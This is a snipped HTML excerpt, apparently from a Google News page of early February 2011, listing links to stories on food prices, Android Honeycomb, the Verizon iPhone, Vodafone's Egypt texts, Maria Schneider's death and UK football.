<span><a target="_blank" class="usg-AFQjCNElzY1E64YOknWsjIXdI-VPJXL0vA " href="http://www.reuters.com/article/2011/02/03/markets-europe-stocks-idINLDE71222Y20110203" id="MAA4AkgBUANgCGoCdWt6AWI"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNE3XUO4AZhAo5QMpYySk6FFGhEvZg " href="http://online.wsj.com/article/BT-CO-20110203-713639.html" id="MAA4AkgBUARgCGoCdWt6AWI"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNG8g1siamvYTU_lOMwRtVzzV98EqA " href="http://www.winnipegfreepress.com/business/breakingnews/shell-cancels-2011-plans-to-drill-exploratory-well-in-beaufort-sea-115203944.html" id="MAA4AkgBUAVgCGoCdWt6AWI"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHtKZjFfQuHRivuxmRGw-mGxoUdTw " href="http://www.ft.com/cms/s/9f542f82-2f62-11e0-834f-00144feabdc0.html" id="MAA4AkgBUAZgCGoCdWt6AWI"><span class="titletext">
...[SNIP]...
<a href="javascript:void(0)" class="email-link"><img class="icon email-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">Email this story</a>
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://news.sky.com/skynews/Home/Business/There-Is-No-Sign-Of-The-Weekly-Shop-Cost-Falling-As-World-Food-Prices-Surge-In-January/Article/201102115922050?lpos=Business_First_Buisness_Article_Teaser_Region_0&amp;lid=ARTICLE_15922050_There_Is_No_Sign_Of_The_Weekly_Shop_Cost_Falling_As_World_Food_Prices_Surge_In_January" class="usg-AFQjCNEamdQacp6RwuKUlPlfbEQ5G6uy2g " title="Sky News"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/qQ6cn3GchXrB9M/0.jpg" width="80" height="45"></a> <div class="source "> <a target="_blank" href="http://news.sky.com/skynews/Home/Business/There-Is-No-Sign-Of-The-Weekly-Shop-Cost-Falling-As-World-Food-Prices-Surge-In-January/Article/201102115922050?lpos=Business_First_Buisness_Article_Teaser_Region_0&amp;lid=ARTICLE_15922050_There_Is_No_Sign_Of_The_Weekly_Shop_Cost_Falling_As_World_Food_Prices_Surge_In_January" class="usg-AFQjCNEamdQacp6RwuKUlPlfbEQ5G6uy2g "> Sky News </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGEQyXQlvL5nYXLC7AMiE0IsBAVhA " href="http://www.reuters.com/article/2011/02/03/food-prices-idUSSGE71203E20110203" id="MAA4AkgCUABgAWoCdWt6AWI"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.dailymail.co.uk/news/article-1353296/Food-prices-soar-crops-hit-new-time-high.html?ito=feeds-newsxml" target="_blank" class="usg-AFQjCNFNoZ45zjQ1sBDW3JKMKzUEGjZIbg " id="MAA4AkgCUAFgAmoCdWt6AWI">Food prices to soar as crops hit a new all-time high</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.bbc.co.uk/worldservice/africa/2011/02/110203_food_prices.shtml" target="_blank" class="usg-AFQjCNH2XTMyOfZBPmqiItoiCcHs-GjsHg " id="MAA4AkgCUAJgAmoCdWt6AWI">Food prices at twenty year high</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFCPz-zkacCpnMfJi08LnuGhEZSLw " href="http://www.ft.com/cms/s/0/60af28b6-2f00-11e0-88ec-00144feabdc0.html" id="MAA4AkgCUANgCGoCdWt6AWI"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGV42cy8U6G7yUKxdGz6HnhYiDdQw " href="http://online.wsj.com/article/SB10001424052748703652104576121852134742690.html" id="MAA4AkgCUARgCGoCdWt6AWI"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEmxvWZhfjvaG7UWhjutAK4oPPv2A " href="http://www.telegraph.co.uk/finance/economics/8300590/Global-food-prices-hit-new-record-high.html" id="MAA4AkgCUAVgCGoCdWt6AWI"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHzLxTvSUsHmh6DEt73qp0wS314fA " href="http://www.livemint.com/2011/02/04001211/Food-prices-on-fire.html?atype=tp" id="MAA4AkgCUAZgCGoCdWt6AWI"><span class="titletext">
...[SNIP]...
<a href="javascript:void(0)" class="email-link"><img class="icon email-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">Email this story</a>
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.reuters.com/article/2011/02/02/us-google-idUSTRE7119R120110202" class="usg-AFQjCNGPo0Ejl3rjoOkpwuD0b2XEPCrDtg " title="Reuters"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/V12gvYkhvK3C7M/0.jpg" width="80" height="57"></a> <div class="source "> <a target="_blank" href="http://www.reuters.com/article/2011/02/02/us-google-idUSTRE7119R120110202" class="usg-AFQjCNGPo0Ejl3rjoOkpwuD0b2XEPCrDtg "> Reuters </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHgzhFS2fN12AMSttb2_O4C_36F9A " href="http://www.pcmag.com/article2/0,2817,2379325,00.asp" id="MAE4AkgAUABgAWoCdWt6AXQ"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=d97oluCcW9U">Video:&nbsp;
Google Previews Android 3.0 OS, Honeycomb
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.pcworld.com/article/218618/developers_give_new_android_market_a_thumbs_up.html" target="_blank" class="usg-AFQjCNFTV0_itNH8B3SK9fipGj_QDrCeCQ " id="MAE4AkgAUAFgAmoCdWt6AXQ">Developers Give New Android Market a Thumbs up</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNH29mmzkCUAWXDrkmy09A55qiKUVg " href="http://www.telegraph.co.uk/technology/google/8299892/Google-updates-Android-Market-to-take-on-Apples-App-Store.html" id="MAE4AkgAUANgCGoCdWt6AXQ"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNE142G4jSbDIQh0ky-F38azbOIGGQ " href="http://www.techradar.com/news/mobile-computing/google-digs-deeper-into-android-3-0-925753" id="MAE4AkgAUARgCGoCdWt6AXQ"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGF_wAoBFdTfqeMTq00sF1zx8OSCw " href="http://www.ubergizmo.com/2011/02/honeycomb-tablets-encryption/" id="MAE4AkgAUAVgCGoCdWt6AXQ"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGuh1ua1Kz5P8Yqwqgh1exFucCTVA " href="http://www.pddnet.com/news-google-android-tablet-moves-forward-020311/" id="MAE4AkgAUAZgCGoCdWt6AXQ"><span class="titletext">
...[SNIP]...
<a href="javascript:void(0)" class="email-link"><img class="icon email-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">Email this story</a>
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.reuters.com/article/2011/02/03/oukin-uk-verizon-iphone-idUKTRE7125VZ20110203" class="usg-AFQjCNFO3tNk7TAfI7C8D7d5xqN3DdMoRA " title="Reuters"><img alt="" class="" src="http://nt2.ggpht.com/news/tbn/TskIVIpZgD9MeM/0.jpg" width="80" height="57"></a> <div class="source "> <a target="_blank" href="http://www.reuters.com/article/2011/02/03/oukin-uk-verizon-iphone-idUKTRE7125VZ20110203" class="usg-AFQjCNFO3tNk7TAfI7C8D7d5xqN3DdMoRA "> Reuters </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGlOVTnW5StI5QGCbBCJyX9b5cA0w " href="http://news.cnet.com/8301-30686_3-20030571-266.html" id="MAE4AkgBUABgAWoCdWt6AXQ"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=twIWCENHNQg">Video:&nbsp;
Bloomberg's Rich Jaroslovsky Reviews Verizon IPhone
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.businessweek.com/news/2011-02-03/verizon-restrains-video-downloads-as-iphone-debuts.html" target="_blank" class="usg-AFQjCNHoLDBRD5ESmd4SJvGdw-5_ECroJw " id="MAE4AkgBUAFgAmoCdWt6AXQ">Verizon Restrains Video Downloads as IPhone Debuts</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHtG6UaQw5Qoa-bzSi1VYQUOTUQHQ " href="http://www.betanews.com/article/Verizon-to-slow-wireless-bandwidth-hogs-iPhone-4-sales-strong/1296758992" id="MAE4AkgBUANgCGoCdWt6AXQ"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGPffUCGUEdY_oBcupKoRJ9Rv92vg " href="http://www.reuters.com/article/2011/02/03/verizon-iphone-idUKN0328058920110203" id="MAE4AkgBUARgCGoCdWt6AXQ"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHezJm3B7U0aMeMALSMTV6ODxSbJQ " href="http://online.wsj.com/article/BT-CO-20110203-710954.html" id="MAE4AkgBUAVgCGoCdWt6AXQ"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFlV61LDIFvRG6Ar0TczPQNco5dOQ " href="http://feeds.informationweek.com/click.phdo?i=111ff3757c4b5cb881cfbd0472cb61eb" id="MAE4AkgBUAZgCGoCdWt6AXQ"><span class="titletext">
...[SNIP]...
<a href="javascript:void(0)" class="email-link"><img class="icon email-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">Email this story</a>
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.ctv.ca/CTVNews/SciTech/20110203/egypt-text-messages-vodafone-110203/" class="usg-AFQjCNEHUN81VVkqPzzKwlAzgjbywIzu1w " title="CTV.ca"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/Gf_PZrnBmwT03M/0.jpg" width="80" height="45"></a> <div class="source "> <a target="_blank" href="http://www.ctv.ca/CTVNews/SciTech/20110203/egypt-text-messages-vodafone-110203/" class="usg-AFQjCNEHUN81VVkqPzzKwlAzgjbywIzu1w "> CTV.ca </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFtxYiZCsbAoqwKoMNXlWcp8fb0LQ " href="http://www.guardian.co.uk/world/2011/feb/03/vodafone-mubarak-text-messages" id="MAE4AkgCUABgAWoCdWt6AXQ"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://news.cnet.com/8301-13578_3-20030543-38.html" target="_blank" class="usg-AFQjCNHZaIcwiwAz6xh_9xn59B7fvaAoyg " id="MAE4AkgCUAFgAmoCdWt6AXQ">Vodafone: We were forced to send pro-Mubarak texts</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.ft.com/cms/s/0/4bf01300-2fc2-11e0-91f8-00144feabdc0.html" target="_blank" class="usg-AFQjCNF3-y7p9dviGqCH3vlHxVag9VTjzA " id="MAE4AkgCUAJgAmoCdWt6AXQ">Pro-government texts anger Vodafone</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHK8ueY2eH9Ntf5qllDOSBiDxRNLw " href="http://www.newsletter.co.uk/news/national/vodafone_hits_out_over_egypt_texts_1_2377923" id="MAE4AkgCUANgCGoCdWt6AXQ"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNExuK2NOsqzbb74opNqEScgiIkbAg " href="http://www.reuters.com/article/2011/02/03/idINIndia-54623620110203" id="MAE4AkgCUARgCGoCdWt6AXQ"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFUP5eBvcY77GpOvLXaHRUO0_yKqg " href="http://online.wsj.com/article/SB10001424052748703652104576122044234987416.html?mod=googlenews_wsj" id="MAE4AkgCUAVgCGoCdWt6AXQ"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNG8UYpYcK3IdkjRa8re5BsQ85O-cA " href="http://www.bbc.co.uk/go/rss/int/news/-/news/business-12357694" id="MAE4AkgCUAZgCGoCdWt6AXQ"><span class="titletext">
...[SNIP]...
<a href="javascript:void(0)" class="email-link"><img class="icon email-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">Email this story</a>
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.moneycontrol.com/news/entertainment/last-tangoparis-star-schneider-dies-paper_519338.html" class="usg-AFQjCNFXraA5mnkUTkflCvOgV5fgfCAz1g " title="Moneycontrol.com"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/pBRyxSbCwIowGM/0.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.moneycontrol.com/news/entertainment/last-tangoparis-star-schneider-dies-paper_519338.html" class="usg-AFQjCNFXraA5mnkUTkflCvOgV5fgfCAz1g "> Moneycontrol.com </a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.reuters.com/article/2011/02/03/uk-france-schneider-factbox-idUKTRE71260S20110203" target="_blank" class="usg-AFQjCNE-ZfLpjnlch97Im2KHsVGzd-11KA " id="MAA4A0gAUAFgAmoCdWt6AWU">Factbox - Controversial actress Maria Schneider</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.guardian.co.uk/film/2011/feb/03/maria-schneider-dies-58" target="_blank" class="usg-AFQjCNEgam8zcz3Rtbdgxur_oG5bcsh9_A " id="MAA4A0gAUAJgAmoCdWt6AWU">Maria Schneider dies aged 58</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFkkSPUrNP3wn78OlWaNTZM1q9lGg " href="http://www.nydailynews.com/entertainment/movies/2011/02/03/2011-02-03_last_tango_in_paris_with_maria_schneider_landed_director_bertolucci_obscenity_co.html" id="MAA4A0gAUANgCGoCdWt6AWU"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNH7CnkBqJDrG5Y2fpsr6rJ5Xpycqg " href="http://news.ninemsn.com.au/article.aspx?id=8206288" id="MAA4A0gAUARgCGoCdWt6AWU"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEGp_8npqn1XGDPZ6fdWxvXQ6zCzg " href="http://moviesblog.mtv.com/2011/02/03/last-tango-in-paris-actress-maria-schneider-dies-at-58/" id="MAA4A0gAUAVgCGoCdWt6AWU"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFnwM4qa0JvW-J6nzbAGel5zaFk4g " href="http://www.screendaily.com/news/europe/last-tango-star-maria-schneider-dies-at-age-58/5023245.article" id="MAA4A0gAUAZgCGoCdWt6AWU"><span class="titletext">
...[SNIP]...
<a href="javascript:void(0)" class="email-link"><img class="icon email-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">Email this story</a>
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.cbc.ca/arts/film/story/2011/02/03/harry-potter-bafta-contribution.html" class="usg-AFQjCNH17QKueGqt7pjeMpBjZ1b2kqD4Og " title="CBC.ca"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/t6-N-jWO8jP9aM/0.jpg" width="80" height="45"></a> <div class="source "> <a target="_blank" href="http://www.cbc.ca/arts/film/story/2011/02/03/harry-potter-bafta-contribution.html" class="usg-AFQjCNH17QKueGqt7pjeMpBjZ1b2kqD4Og "> CBC.ca </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGnDTSmEyCz1wbOXrlDUX8oEUzvjw " href="http://www.thesun.co.uk/sol/homepage/showbiz/bizarre/3389517/Award-glory-for-Potter-at-last.html" id="MAA4A0gBUABgAWoCdWt6AWU"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.bbc.co.uk/go/rss/int/news/-/news/entertainment-arts-12353795" target="_blank" class="usg-AFQjCNELBjj4o-VgOAo8aVQgU9YTwhNWAQ " id="MAA4A0gBUAFgAmoCdWt6AWU">Potter movies honoured by Bafta</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.thisislondon.co.uk/showbiz/article-23920167-harry-potter-finally-gets-his-hands-on-an-award---at-the-baftas.do" target="_blank" class="usg-AFQjCNFdQDJsDvnlaxpM5NNq10M7fS4uww " id="MAA4A0gBUAJgAmoCdWt6AWU">Harry Potter finally gets his hands on an award - at the Baftas</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHAlUIK_1cZLoWLo7Pps-Gvkcz6PQ " href="http://www.metro.co.uk/film/854541-harry-potter-to-get-outstanding-contribution-gong-at-baftas" id="MAA4A0gBUARgCGoCdWt6AWU"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGblLAgj68arUUXx4TdUWpX6AAIjg " href="http://www.indiablooms.com/BollywoodDetailsPage/bollywoodDetails030211c.php" id="MAA4A0gBUAVgCGoCdWt6AWU"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNH0j7MQuOFlNFGufvsLyN-bFyflJA " href="http://www.rupert-grint.us/wordpress/2011/02/03/rupert-grint-harry-potter-to-be-honoured-at-the-baftas/" id="MAA4A0gBUAZgCGoCdWt6AWU"><span class="titletext">
...[SNIP]...
<a href="javascript:void(0)" class="email-link"><img class="icon email-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">Email this story</a>
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.whtimes.co.uk/news/hertfordshire_festival_founder_jailed_for_tesco_fraud_1_792678" class="usg-AFQjCNHwdY6vB8geyCE1yDrYA7MwHYxCuQ " title="Times 24"><img alt="" class="" src="http://nt2.ggpht.com/news/tbn/1klVmupOykqjVM/0.jpg" width="80" height="57"></a> <div class="source "> <a target="_blank" href="http://www.whtimes.co.uk/news/hertfordshire_festival_founder_jailed_for_tesco_fraud_1_792678" class="usg-AFQjCNHwdY6vB8geyCE1yDrYA7MwHYxCuQ "> Times 24 </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHwdY6vB8geyCE1yDrYA7MwHYxCuQ " href="http://www.whtimes.co.uk/news/hertfordshire_festival_founder_jailed_for_tesco_fraud_1_792678" id="MAA4A0gCUABgAWoCdWt6AWU"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.bbc.co.uk/go/rss/int/news/-/news/uk-england-beds-bucks-herts-12358495" target="_blank" class="usg-AFQjCNFUyME49y2mIlwy-lc3ae-yMIVLlw " id="MAA4A0gCUAFgAmoCdWt6AWU">Viscount&#39;s son jailed for fraud</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.gigwise.com/news/61119/Standon-Calling-Festival-Boss-Jailed-For-Defrauding-Tesco" target="_blank" class="usg-AFQjCNE-h1a3OziZUFTygvn-GZVgsMm9fg " id="MAA4A0gCUAJgAmoCdWt6AWU">Standon Calling Festival Boss Jailed For Defrauding Tesco</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEn7VCkso18vgTDXiXJNdA8S682gg " href="http://www.retail-week.com/sectors/food/viscounts-son-jailed-for-defrauding-tesco/5022017.article" id="MAA4A0gCUANgCGoCdWt6AWU"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEA6d9pc3Tcm3XjPJm1pQNMKpmEVQ " href="http://www.efestivals.co.uk/news/11/110203f.shtml" id="MAA4A0gCUARgCGoCdWt6AWU"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEEWwZl9NBluqpH_eVdvMYVK9HhnQ " href="http://www.virtualfestivals.com/latest/news/9392/-/Standon-Calling-chief-jailed-for-swindling-Tesco" id="MAA4A0gCUAVgCGoCdWt6AWU"><span class="titletext">
...[SNIP]...
<a href="javascript:void(0)" class="email-link"><img class="icon email-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">Email this story</a>
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.telegraph.co.uk/sport/football/teams/liverpool/8301284/Liverpools-January-spending-spree-how-Luis-Suarez-and-Andy-Carroll-will-fit-into-Kenny-Dalglishs-plans.html" class="usg-AFQjCNE68RHm_YFG0EFZZOkMHthFHbsk1A " title="Telegraph.co.uk"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/SYslCbFLQsefjM/0.jpg" width="80" height="50"></a> <div class="source "> <a target="_blank" href="http://www.telegraph.co.uk/sport/football/teams/liverpool/8301284/Liverpools-January-spending-spree-how-Luis-Suarez-and-Andy-Carroll-will-fit-into-Kenny-Dalglishs-plans.html" class="usg-AFQjCNE68RHm_YFG0EFZZOkMHthFHbsk1A "> Telegraph.co.uk </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFHyK9tDxD-860e9SxTM4J6Rb74jA " href="http://www.goal.com/en-gb/news/2896/premier-league/2011/02/03/2335873/goalcom-uk-poll-results-liverpools-luis-suarez-is-the-best" id="MAE4A0gAUABgAWoCdWt6AXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=DQzMRGmHksw">Video:&nbsp;
Liverpool FC's number nine Andy Carroll unveiled at press conference
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.skysports.com/story/0,19528,11678_6720722,00.html" target="_blank" class="usg-AFQjCNECudBkpXr1QZXMBsRduEeq-S-8Cw " id="MAE4A0gAUAFgAmoCdWt6AXM">Nolan wants Carroll closure</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFfPTn53FP_nFDex6BpU1o9odgk1A " href="http://soccerlens.com/shirts/andy-carroll-20102011-liverpool-shirt/8081/" id="MAE4A0gAUANgCGoCdWt6AXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFTmCsYeJ3giAUeM-40rziKX48dsQ " href="http://www.telegraph.co.uk/sport/football/teams/liverpool/8300929/Luis-Suarez-hails-dream-debut-for-Liverpool.html" id="MAE4A0gAUARgCGoCdWt6AXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGisJxwsrLQToYgzPOV6sRj0rcn6A " href="http://www.thesun.co.uk/sol/homepage/sport/football/3388891/Liverpool-striker-Andy-Carroll-wants-to-prove-hes-worth-35m.html" id="MAE4A0gAUAVgCGoCdWt6AXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGxgXUKQ72u3jLZmue660jHGxH2qg " href="http://soccernet.espn.go.com/news/story/_/id/875246/kenny-dalglish:-new-liverpool-quartet-will-&#39;frighten&#39;-rivals" id="MAE4A0gAUAZgCGoCdWt6AXM"><span class="titletext">
...[SNIP]...
<a href="javascript:void(0)" class="email-link"><img class="icon email-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">Email this story</a>
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.telegraph.co.uk/sport/football/teams/rangers/8301313/Serial-killers-get-a-better-press-than-El-Hadji-Diouf-says-Rangers-manager-Walter-Smith.html" class="usg-AFQjCNGgEPDauuPFx5XvcdwTsxXpr0WIsA " title="Telegraph.co.uk"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/Ue30f9jTs6zObM/0.jpg" width="80" height="50"></a> <div class="source "> <a target="_blank" href="http://www.telegraph.co.uk/sport/football/teams/rangers/8301313/Serial-killers-get-a-better-press-than-El-Hadji-Diouf-says-Rangers-manager-Walter-Smith.html" class="usg-AFQjCNGgEPDauuPFx5XvcdwTsxXpr0WIsA "> Telegraph.co.uk </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHkZyzTkCK3MRRIH-X_fDi8vOdVBA " href="http://uk.eurosport.yahoo.com/03022011/63/diouf-good-signing-lennon.html" id="MAE4A0gBUABgAWoCdWt6AXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.dailyrecord.co.uk/2011/02/03/rangers-assistant-ally-mccoist-el-hadji-diouf-s-critics-should-know-better-86908-22896679/" target="_blank" class="usg-AFQjCNGWHFX4H91F-RVp9pTVWYzOsCFPyQ " id="MAE4A0gBUAFgAmoCdWt6AXM">Rangers assistant Ally McCoist: El Hadji Diouf&#39;s critics should know better</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.skysports.com/story/0,19528,11781_6720343,00.html" target="_blank" class="usg-AFQjCNE2D99GE5igQcZAF68-L-PAdfqxRw " id="MAE4A0gBUAJgAmoCdWt6AXM">McCoist backing for Diouf</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFl9_nPrt2iyZnY2YjjG6i9EpFsKA " href="http://www.telegraph.co.uk/sport/football/competitions/scottish-premier/8299825/Rangers-1-Hearts-0-match-report.html" id="MAE4A0gBUANgCGoCdWt6AXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFlnwHMjXUZVH1BJwSCb5N51HLL1w " href="http://www.guardian.co.uk/football/2011/feb/02/rangers-hearts-spl" id="MAE4A0gBUARgCGoCdWt6AXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHBJQaOw-A05o38ivJDjORtllPQ0Q " href="http://news.bbc.co.uk/go/rss/int/news/-/sport1/hi/football/scot_prem/9384354.stm" id="MAE4A0gBUAVgCGoCdWt6AXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGuyxLAUm8gOBHQ6Dr4OnbvD5Fp3A " href="http://news.bbc.co.uk/sport2/hi/football/teams/r/rangers/9385793.stm" id="MAE4A0gBUAZgCGoCdWt6AXM"><span class="titletext">
...[SNIP]...
<a href="javascript:void(0)" class="email-link"><img class="icon email-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">Email this story</a>
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://soccernet.espn.go.com/news/story/_/id/875353/arsene-wenger:-gary-neville-is-premier-league&#39;s-best-right-back" class="usg-AFQjCNGIWVxmxFcvIb0F0k0heMdaCa0OIg " title="ESPN"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/jYy3e5o_hQElSM/0.jpg" width="58" height="80"></a> <div class="source "> <a target="_blank" href="http://soccernet.espn.go.com/news/story/_/id/875353/arsene-wenger:-gary-neville-is-premier-league&#39;s-best-right-back" class="usg-AFQjCNGIWVxmxFcvIb0F0k0heMdaCa0OIg "> ESPN </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGCcv4DCQrNwd-K91I-HGUM1pElEg " href="http://www.guardian.co.uk/football/2011/feb/03/gary-neville-manchester-united" id="MAE4A0gCUABgAWoCdWt6AXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.telegraph.co.uk/sport/football/teams/manchester-united/8300892/Gary-Neville-the-pundit-the-case-for-and-against.html" target="_blank" class="usg-AFQjCNGn3jK7VN5V99QPg9nb-IC_OKjzcQ " id="MAE4A0gCUAFgAmoCdWt6AXM">Gary Neville the pundit: the case for and against</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.manutd.com/en/News-And-Features/Exclusive-Interviews/2011/Feb/Gary-Neville-interview-part-one.aspx" target="_blank" class="usg-AFQjCNGC5wrxv8h69MiQm0OeUQqIVynOPQ " id="MAE4A0gCUAJgAmoCdWt6AXM">Neville: Why I called it a day</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEpZ76C21RU6AWH72A-hIq11QpvdA " href="http://www.sportsfeatures.com/soccernews/story/48107/rooney-warns-united-against-relaxing-about-10-point-lead-over-champions" id="MAE4A0gCUANgCGoCdWt6AXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHeOUnrTMrRS9OdPGObrJvDsP5nHw " href="http://www.skysports.com/story/0,19528,11661_6720573,00.html" id="MAE4A0gCUARgCGoCdWt6AXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFKr6FvlMtN7-paEZphGVyJLQxtTA " href="http://www.dailymail.co.uk/sport/football/article-1353057/Gary-Neville-true-fighter-bristled-attitude.html?ito=feeds-newsxml" id="MAE4A0gCUAVgCGoCdWt6AXM"><span class="titletext">
...[SNIP]...
<a href="javascript:void(0)" class="email-link"><img class="icon email-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">Email this story</a>
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.latimes.com/health/boostershots/la-heb-mad-cow-20110202,0,1943157.story" class="usg-AFQjCNHgyq4D9cVZoiLZIW_CdaHFMM-Ewg " title="Los Angeles Times"><img alt="" class="" src="http://nt2.ggpht.com/news/tbn/IoYfE7OcbO7iZM/0.jpg" width="80" height="54"></a> <div class="source "> <a target="_blank" href="http://www.latimes.com/health/boostershots/la-heb-mad-cow-20110202,0,1943157.story" class="usg-AFQjCNHgyq4D9cVZoiLZIW_CdaHFMM-Ewg "> Los Angeles Times </a>
...[SNIP]...
